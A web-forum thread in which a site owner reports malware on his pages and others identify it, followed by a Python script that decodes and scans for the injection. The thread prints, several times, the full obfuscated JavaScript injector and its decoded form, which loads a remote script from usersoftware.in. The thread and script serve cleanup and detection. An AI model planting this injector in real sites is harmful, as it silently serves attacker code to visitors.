Malware Found on our Server - Novice here - Need some advice
Toff:
Hello everyone,
I came across your forum just googling it up. Thank God I finally found a place to hopefully find an answer to this.
Around May we received replies from customers stating that we had a virus on our website.
http://www.malwaredomainlist.com/mdl.php?search=usersoftware.in&colsearch=All&quantity=50
If you visit:
www.graduationsource.com or www.avantisystemsusa.com
usersoftware.in loads in the loading screen.
I have no idea what to do. No idea how to fix the problem and no idea even where to begin. Any input would be greatly appreciated.
sowhat-x:
--- Code: ---<script language="javascript">
var xqv='%';document.write(unescape('%3C%73%63%72'+xqv+'69'+xqv+'70'+xqv+'74'+xqv+'20'+xqv+'6C'+xqv+'61'+xqv+'6E'+xqv+'67%75%61%67%65%3D'+xqv+'22'+xqv+'4A'+xqv+'61%76%61%53%63%72%69%70'+xqv+'74'+xqv+'22'+xqv+'3E'+xqv+'0A%76%61%72%20%6C%3D%27%68%74%74%70'+xqv+'3A'+xqv+'2F%2F%75%73%65%72%73%6F%66'+xqv+'74%77%61%72%65%2E%69%6E'+xqv+'2F%78%71%2F%76'+xqv+'73'+xqv+'74'+xqv+'61%76%6B%61%2E%70%68%70%3F'+xqv+'72'+xqv+'3D%27%3B%76%61%72%20'+xqv+'72%3D%65%6E'+xqv+'63%6F%64%65%55%52%49%43%6F%6D%70%6F'+xqv+'6E%65'+xqv+'6E%74'+xqv+'28'+xqv+'64'+xqv+'6F%63%75%6D%65%6E'+xqv+'74'+xqv+'2E'+xqv+'72'+xqv+'65%66%65%72%72%65%72'+xqv+'29'+xqv+'3B'+xqv+'69'+xqv+'66%28%72%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%73%72%63%3D%27%2B%6C%2B%72%2B%27%3E%3C%2F%73%63%72%27%2B%27%69%70%74%3E%27%29%3B%7D%0A%3C%2F%73%63%72%69%70%74%3E' ));
</script>
--- End code ---
A quick look shows that the above is the malicious code
that has been injected/infecting over there... when decoded, it resolves to:
--- Code: ---<script language="JavaScript">
var l='http://usersoftware.in/xq/vstavka.php?r=';var r=encodeURIComponent(document.referrer);if(r){document.write('<script src='+l+r+'></scr'+'ipt>');}
</script>
--- End code ---
Meaning, as a first-step reaction, you should grep through your HTMLs and clean it...
Orac:
Hi Toff
I assume you have root access to the server.
Comment out this whole section of script and it will block the link to usersoftware.in
--- Code: ---<script language="javascript">
var xqv='%';document.write(unescape('%3C%73%63%72'+xqv+'69'+xqv+'70'+xqv+'74'+xqv+'20'+xqv+'6C'+xqv+'61'+xqv+'6E'+xqv+'67%75%61%67%65%3D'+xqv+'22'+xqv+'4A'+xqv+'61%76%61%53%63%72%69%70'+xqv+'74'+xqv+'22'+xqv+'3E'+xqv+'0A%76%61%72%20%6C%3D%27%68%74%74%70'+xqv+'3A'+xqv+'2F%2F%75%73%65%72%73%6F%66'+xqv+'74%77%61%72%65%2E%69%6E'+xqv+'2F%78%71%2F%76'+xqv+'73'+xqv+'74'+xqv+'61%76%6B%61%2E%70%68%70%3F'+xqv+'72'+xqv+'3D%27%3B%76%61%72%20'+xqv+'72%3D%65%6E'+xqv+'63%6F%64%65%55%52%49%43%6F%6D%70%6F'+xqv+'6E%65'+xqv+'6E%74'+xqv+'28'+xqv+'64'+xqv+'6F%63%75%6D%65%6E'+xqv+'74'+xqv+'2E'+xqv+'72'+xqv+'65%66%65%72%72%65%72'+xqv+'29'+xqv+'3B'+xqv+'69'+xqv+'66%28%72%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%73%72%63%3D%27%2B%6C%2B%72%2B%27%3E%3C%2F%73%63%72%27%2B%27%69%70%74%3E%27%29%3B%7D%0A%3C%2F%73%63%72%69%70%74%3E' ));
</script>
--- End code ---
It looks as though there may also be other malware on the sites, which will take further digging to reveal.
Please post back as to how you got on.
Toff:
After removing all of the coding it automatically embeds itself again on all of the pages.
sowhat-x:
Toff, say until some more digging/analysis takes place,
have a look at the links mentioned in this post here, to get an idea of what's been happening...
http://www.malwaredomainlist.com/forums/index.php?topic=1965.msg3919#msg3919
They might also give you a few ideas on where to start searching in your server
for places where extra malicious scripts/code might reside, etc...
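The two things the thread asks for, decoding the `document.write(unescape(...))` dropper that sowhat-x showed and grepping the web root for every copy of it (including the copies that reappear after cleaning, as Toff reports), can be done with one small script. This is an added example, not code from the thread or from any of the posters: the regexes, the `xqv` variable substitution and the `SAMPLE_PAGE` wrapper are my assumptions; the obfuscated snippet embedded in the sample is the one quoted above, and the decoded output it should produce is the one sowhat-x posted.

```python
"""
Decode document.write(unescape(...)) injections and scan a web root for them.
Added example; not the forum thread's or any poster's own code.
"""
import os
import re
import sys
from urllib.parse import unquote

# `var NAME='VALUE';` definitions, e.g. the xqv='%' helper the dropper uses (assumed form)
VAR_DEF = re.compile(r"var\s+(\w+)\s*=\s*'([^']*)'\s*;")
# the concatenated argument handed to document.write(unescape(...))
UNESCAPE_CALL = re.compile(
    r"document\.write\s*\(\s*unescape\s*\(\s*(.*?)\s*\)\s*\)", re.S)
# one piece of that argument: a single-quoted literal or a bare identifier
PIECE = re.compile(r"'([^']*)'|([A-Za-z_]\w*)")
URL = re.compile(r"https?://[^\s'\"<>]+")


def decode_injections(script_text):
    """Return the decoded payload of every document.write(unescape(...)) call
    in script_text, rebuilding the string concatenation first."""
    variables = dict(VAR_DEF.findall(script_text))
    decoded = []
    for call in UNESCAPE_CALL.finditer(script_text):
        parts = []
        for literal, ident in PIECE.findall(call.group(1)):
            # identifiers are replaced by their var value; unknown ones become ''
            parts.append(variables.get(ident, "") if ident else literal)
        decoded.append(unquote("".join(parts)))
    return decoded


def external_urls(decoded_script):
    """Remote hosts the decoded payload pulls scripts from (what to block and hunt for)."""
    return URL.findall(decoded_script)


def scan_directory(root, extensions=(".html", ".htm", ".php", ".js")):
    """Walk a web root and report (path, decoded payload, urls) for every hit.
    Re-run it after cleaning to see whether the injection came back."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for payload in decode_injections(text):
                findings.append((path, payload, external_urls(payload)))
    return findings


# Constructed sample page: the obfuscated snippet quoted in the thread, wrapped in HTML
SAMPLE_PAGE = """<html><body><p>Welcome</p>
<script language="javascript">
var xqv='%';document.write(unescape('%3C%73%63%72'+xqv+'69'+xqv+'70'+xqv+'74'+xqv+'20'+xqv+'6C'+xqv+'61'+xqv+'6E'+xqv+'67%75%61%67%65%3D'+xqv+'22'+xqv+'4A'+xqv+'61%76%61%53%63%72%69%70'+xqv+'74'+xqv+'22'+xqv+'3E'+xqv+'0A%76%61%72%20%6C%3D%27%68%74%74%70'+xqv+'3A'+xqv+'2F%2F%75%73%65%72%73%6F%66'+xqv+'74%77%61%72%65%2E%69%6E'+xqv+'2F%78%71%2F%76'+xqv+'73'+xqv+'74'+xqv+'61%76%6B%61%2E%70%68%70%3F'+xqv+'72'+xqv+'3D%27%3B%76%61%72%20'+xqv+'72%3D%65%6E'+xqv+'63%6F%64%65%55%52%49%43%6F%6D%70%6F'+xqv+'6E%65'+xqv+'6E%74'+xqv+'28'+xqv+'64'+xqv+'6F%63%75%6D%65%6E'+xqv+'74'+xqv+'2E'+xqv+'72'+xqv+'65%66%65%72%72%65%72'+xqv+'29'+xqv+'3B'+xqv+'69'+xqv+'66%28%72%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%73%72%63%3D%27%2B%6C%2B%72%2B%27%3E%3C%2F%73%63%72%27%2B%27%69%70%74%3E%27%29%3B%7D%0A%3C%2F%73%63%72%69%70%74%3E' ));
</script>
</body></html>"""


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # usage: python scan_injection.py /path/to/webroot
        for path, payload, urls in scan_directory(sys.argv[1]):
            print(path, "->", ", ".join(urls))
    else:
        for payload in decode_injections(SAMPLE_PAGE):
            print(payload)
            print("loads from:", external_urls(payload))
```

Run with no arguments it prints the decoded `vstavka.php?r=` loader from the sample; run with a web root it lists every file that still carries the dropper and the host it loads from. Because the dropper only fires when `document.referrer` is non-empty, opening the page directly in a browser shows nothing, which is why scanning the files on disk rather than the rendered page is the reliable check.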